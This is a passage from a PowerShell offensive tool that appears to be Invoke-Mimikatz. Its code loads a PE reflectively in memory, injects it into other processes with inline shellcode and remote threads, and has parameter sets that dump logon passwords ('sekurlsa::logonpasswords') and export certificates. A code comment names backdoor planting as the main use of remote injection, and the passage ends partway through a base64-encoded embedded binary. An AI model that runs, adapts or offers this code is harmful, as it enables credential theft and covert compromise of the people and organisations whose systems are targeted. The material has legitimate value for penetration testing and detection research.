memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif ($NXCompatible -eq $true)\n\t\t\t{\n\t\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t}\n\t\t\t$EffectivePEHandle = $PEHandle\n\t\t}\n\t\t\n\t\t[IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)\n\t\tif ($PEHandle -eq [IntPtr]::Zero)\n\t\t{ \n\t\t\tThrow \"VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free).\"\n\t\t}\t\t\n\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null\n\t\t\n\t\t\n\t\t#Now that the PE is in memory, get more detailed information about it\n\t\tWrite-Verbose \"Getting detailed PE information from the headers loaded in memory\"\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle\n\t\tWrite-Verbose \"StartAddress: $PEHandle    EndAddress: $PEEndAddress\"\n\t\t\n\t\t\n\t\t#Copy each section from the PE in to memory\n\t\tWrite-Verbose \"Copy PE sections in to memory\"\n\t\tCopy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types\n\t\t\n\t\t\n\t\t#Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded\n\t\tWrite-Verbose \"Update memory addresses based on where the PE was actually loaded in memory\"\n\t\tUpdate-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types\n\n\t\t\n\t\t#The PE we are in-memory loading has DLLs it needs, import those DLLs for it\n\t\tWrite-Verbose \"Import DLL's needed by the PE we are loading\"\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\tImport-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\tImport-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t}\n\t\t\n\t\t\n\t\t#Update the memory protection flags for all the memory just allocated\n\t\tif ($RemoteLoading -eq $false)\n\t\t{\n\t\t\tif ($NXCompatible -eq $true)\n\t\t\t{\n\t\t\t\tWrite-Verbose \"Update memory protection flags\"\n\t\t\t\tUpdate-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tWrite-Verbose \"PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tWrite-Verbose \"PE being loaded in to a remote process, not adjusting memory permissions\"\n\t\t}\n\t\t\n\t\t\n\t\t#If remote loading, copy the DLL in to remote process memory\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t[UInt32]$NumBytesWritten = 0\n\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t}\n\t\t}\n\t\t\n\t\t\n\t\t#Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function\n\t\tif ($PEInfo.FileType -ieq \"DLL\")\n\t\t{\n\t\t\tif ($RemoteLoading -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Verbose \"Calling dllmain so the DLL knows it has been loaded\"\n\t\t\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\t\t\n\t\t\t\t$DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\n\t\t\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t\t\t{\n\t\t\t\t\t#Shellcode: CallDllMain.asm\n\t\t\t\t\t$CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)\n\t\t\t\t\t$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)\n\t\t\t\t\t$CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t#Shellcode: CallDllMain.asm\n\t\t\t\t\t$CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)\n\t\t\t\t\t$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)\n\t\t\t\t\t$CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t}\n\t\t\t\t$SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)\n\t\t\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\t\t\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)\n\t\t\t\t\n\t\t\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t\t}\n\n\t\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\t\tif ($Result -ne 0)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t}\n\t\t}\n\t\telseif ($PEInfo.FileType -ieq \"EXE\")\n\t\t{\n\t\t\t#Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process\n\t\t\t[IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)\n\t\t\t[System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)\n\t\t\t$OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr\n\n\t\t\t#If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread\n\t\t\t#\tThis way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.\n\t\t\t[IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\tWrite-Verbose \"Call EXE Main function. Address: $ExeMainPtr. Creating thread for the EXE to run in.\"\n\n\t\t\t$Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null\n\n\t\t\twhile($true)\n\t\t\t{\n\t\t\t\t[Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)\n\t\t\t\tif ($ThreadDone -eq 1)\n\t\t\t\t{\n\t\t\t\t\tCopy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants\n\t\t\t\t\tWrite-Verbose \"EXE thread has completed.\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tStart-Sleep -Seconds 1\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\treturn @($PEInfo.PEHandle, $EffectivePEHandle)\n\t}\n\t\n\t\n\tFunction Invoke-MemoryFreeLibrary\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$PEHandle\n\t\t)\n\t\t\n\t\t#Get Win32 constants and functions\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t#Call FreeLibrary for all the imports of the DLL\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t{\n\t\t\t[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\twhile ($true)\n\t\t\t{\n\t\t\t\t$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t#If the structure is null, it signals that this is the end of the array\n\t\t\t\tif ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t{\n\t\t\t\t\tWrite-Verbose \"Done unloading the libraries needed by the PE\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))\n\t\t\t\t$ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)\n\n\t\t\t\tif ($ImportDllHandle -eq $null)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n\t\t\t\tif ($Success -eq $false)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Call DllMain with process detach\n\t\tWrite-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\n\t\t$DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\t\t\n\t\t\n\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t}\n\t}\n\n\n\tFunction Main\n\t{\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants =  Get-Win32Constants\n\t\t\n\t\t$RemoteProcHandle = [IntPtr]::Zero\n\t\n\t\t#If a remote process to inject in to is specified, get a handle to it\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n\t\t{\n\t\t\tThrow \"Can't supply a ProcId and ProcName, choose one or the other\"\n\t\t}\n\t\telseif ($ProcName -ne $null -and $ProcName -ne \"\")\n\t\t{\n\t\t\t$Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n\t\t\tif ($Processes.Count -eq 0)\n\t\t\t{\n\t\t\t\tThrow \"Can't find process $ProcName\"\n\t\t\t}\n\t\t\telseif ($Processes.Count -gt 1)\n\t\t\t{\n\t\t\t\t$ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n\t\t\t\tWrite-Output $ProcInfo\n\t\t\t\tThrow \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$ProcId = $Processes[0].ID\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.\n\t\t#If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n#\t\tif ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n#\t\t{\n#\t\t\tWrite-Verbose \"Getting SeDebugPrivilege\"\n#\t\t\tEnable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n#\t\t}\t\n\t\t\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0))\n\t\t{\n\t\t\t$RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n\t\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't obtain the handle for process ID: $ProcId\"\n\t\t\t}\n\t\t\t\n\t\t\tWrite-Verbose \"Got the handle for the remote process to inject in to\"\n\t\t}\n\t\t\n\n\t\t#Load the PE reflectively\n\t\tWrite-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n\n        try\n        {\n            $Processors = Get-WmiObject -Class Win32_Processor\n        }\n        catch\n        {\n            throw ($_.Exception)\n        }\n\n        if ($Processors -is [array])\n        {\n            $Processor = $Processors[0]\n        } else {\n            $Processor = $Processors\n        }\n\n        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) )\n        {\n            Write-Verbose ( \"Architecture: \" + $Processor.AddressWidth + \" Process: \" + ([System.IntPtr]::Size * 8))\n            Write-Error \"PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS.\" -ErrorAction Stop\n        }\n\n        #Determine whether or not to use 32bit or 64bit bytes\n        if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)\n        }\n        else\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)\n        }\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n\t\t$PEHandle = [IntPtr]::Zero\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\tif ($PELoadedInfo -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to load PE, handle returned is NULL\"\n\t\t}\n\t\t\n\t\t$PEHandle = $PELoadedInfo[0]\n\t\t$RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\t\t\n\t\t\n\t\t#Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\tif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n\t\t{\n\t\t\t#########################################\n\t\t\t### YOUR CODE GOES HERE\n\t\t\t#########################################\n                    Write-Verbose \"Calling function with WString return type\"\n\t\t\t\t    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"powershell_reflective_mimikatz\"\n\t\t\t\t    if ($WStringFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Couldn't find function address.\"\n\t\t\t\t    }\n\t\t\t\t    $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n\t\t\t\t    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)\n                    $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)\n\t\t\t\t    [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput)\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)\n\t\t\t\t    if ($OutputPtr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t    \tThrow \"Unable to get output, Output Ptr is NULL\"\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t        $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\n\t\t\t\t        Write-Output $Output\n\t\t\t\t        $Win32Functions.LocalFree.Invoke($OutputPtr);\n\t\t\t\t    }\n\t\t\t#########################################\n\t\t\t### END OF YOUR CODE\n\t\t\t#########################################\n\t\t}\n\t\t#For remote DLL injection, call a void function which takes no parameters\n\t\telseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\tif (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n\t\t\t{\n\t\t\t\tThrow \"VoidFunc couldn't be found in the DLL\"\n\t\t\t}\n\t\t\t\n\t\t\t$VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n\t\t\t$VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\t\t\t\n\t\t\t#Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n\t\t}\n\t\t\n\t\t#Don't free a library if it is injected in a remote process\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tInvoke-MemoryFreeLibrary -PEHandle $PEHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\t#Just delete the memory allocated in PowerShell to build the PE before injecting to remote process\n\t\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t\t}\n\t\t}\n\t\t\n\t\tWrite-Verbose \"Done!\"\n\t}\n\n\tMain\n}\n\n#Main function to either run the script locally or remotely\nFunction Main\n{\n\tif (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n\t{\n\t\t$DebugPreference  = \"Continue\"\n\t}\n\t\n\tWrite-Verbose \"PowerShell ProcessID: $PID\"\n\t\n\n\tif ($PsCmdlet.ParameterSetName -ieq \"DumpCreds\")\n\t{\n\t\t$ExeArgs = \"sekurlsa::logonpasswords exit\"\n\t}\n    elseif ($PsCmdlet.ParameterSetName -ieq \"DumpCerts\")\n    {\n        $ExeArgs = \"crypto::cng crypto::capi `\"crypto::certificates /export`\" `\"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`\" exit\"\n    }\n    else\n    {\n        $ExeArgs = $Command\n    }\n\n    [System.IO.Directory]::SetCurrentDirectory($pwd)\n\n\t\n    $PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABljzs6Ie5VaSHuVWkh7lVpKJbAaSDuVWkoltZpGe5VaSiW0Wku7lVpKJbGaSPuVWlHAJ5pI+5VaboFnmkj7lVpV3MuaTTuVWkh7lRpMO9VaQYoK2kg7lVpKJbcaRPuVWkolsdpIO5VaSiWxGkg7lVpUmljaCHuVWkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAAZIYFAI3c4lQAAAAAAAAAAPAAIiALAgkAAOIBAACeAQAAAAAAlJgBAAAQAAAAAACAAQAAAAAQAAAAAgAABQACAAAAAAAFAAIAAAAAAADAAwAABAAAAAAAAAMAQAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAFIDAF8AAAAINwMAGAEAAAAAAAAAAAAAAJADAFAQAAAAAAAAAAAAAACwAwCkBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAOAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGjgAQAAEAAAAOIBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABfUgEAAAACAABUAQAA5gEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAzC8AAABgAwAAKAAAADoDAAAAAAAAAAAAAAAAAEAAAMAucGRhdGEAAFAQAAAAkAMAABIAAABiAwAAAAAAAAAAAAAAAABAAABALnJlbG9jAADYBwAAALADAAAIAAAAdAMAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiJXCQISIlsJBBIiXQkGFdBVEFVSIPsIEyL4UiLCUyL6rKAhFEBdBAPt0ECZsHICA+32IPDBOsHD7ZZAYPDAkGEVQF0EUEPt0UCZsHICA+3+IPHBOsIQQ+2fQGDxwKEUQF0UI0UH7lAAAAA/xWv8wEASIvwSIXAD4TtAAAASYsUJEyLw0iLyOhqiQEASI0MM0SLx0mL1ehbiQEAD7dGAmbByAhmA8dmwcgIZolGAumgAAAAD7ZpAblAAAAAA++D/X92XYvVSIPCBP8VUfMBAEiL8EiFwA+EjwAAAEmLFCRIjUgERA+2QgFIg8IC6AWJAQBJiwQkRIvHD7ZIAUmL1UiNTDEE6O2IAQBNixwkZsHNCEGKA8ZGAYJmiW4CiAbrM40UH/8V9/IBAEiL8EiFwHQ5SYsUJEyLw0iLyOi2iAEASI0MM0SLx0mL1einiAEAQAB+AUmLzf8VvPIBAEmLDCT/FbLyAQBJiTQkSItcJEBIi2wkSEiLdCRQSIPEIEFdQVxfw8xIiVwkCEiJdCQQV0iD7CCK2roCAAAASIvxjUo+SYv4/xV38gEASIXAdAmAy6DGQAEAiBhIiUQkSEiFwHQnSIX/dBJIjUwkSEiL1+gt/v//SItEJEhIhcB0C0iL0EiLzugY/v//SItcJDBIi3QkOEiDxCBfw0iJXCQISIlsJBBIiXQkGFdBVEFVSIPsIESK4UmL6UGL+LlAAAAASIvyQYP4f3YySI1XBEyL7/8V7PEBAEiL2EiFwHRKZsHPCESIIMZAAYJmiXgCSIX2dDZIjUgETYvF6yVIjVcC/xW98QEASIvYSIXAdBtEiCBAiHgBSIX2dA9IjUgCTIvHSIvW6HCHAQBIhe10EkiF23QLSIvTSIvN6GX9//8z20iLbCRISIt0JFBIi8NIi1wkQEiDxCBBXUFcX8PMzMxIg+x4SI1UJFD/FV3xAQCFwHRmD7dMJFoPt1QkWEQPt0QkVg+3RCRcRA+3VCRSRA+3TCRQiUQkQIlMJDiJVCQwRIlEJChIjUwkYEyNBcP1AQC6EAAAAESJVCQg6Eh/AQCFwH4VRTPJSI1UJGCxGEWNQQ/oxf7//+sCM8BIg8R4w0BTSIPsMEiL0UiNTCQgQbABM9vounwBADvDfCJED7dEJCBIi1QkKEUzybEb6Iv+//9IjUwkIEiL2OiafAEASIvDSIPEMFvDzEiJXCQISIl0JBBXSIPsIEiL8TPSM8kz2/8VRvABAI1LQIvQi/hIA9L/FW7wAQBIiQZIO8N0Kjv7dh1Ii9CLz/8VH/ABAESL2I1H/0Q72HUHuwEAAADrCUiLDv8VNPABAEiLdCQ4i8NIi1wkMEiDxCBfw8zMSIvESIlYCEiJaBBIiXAYV0FUQVVIg+xAM9tF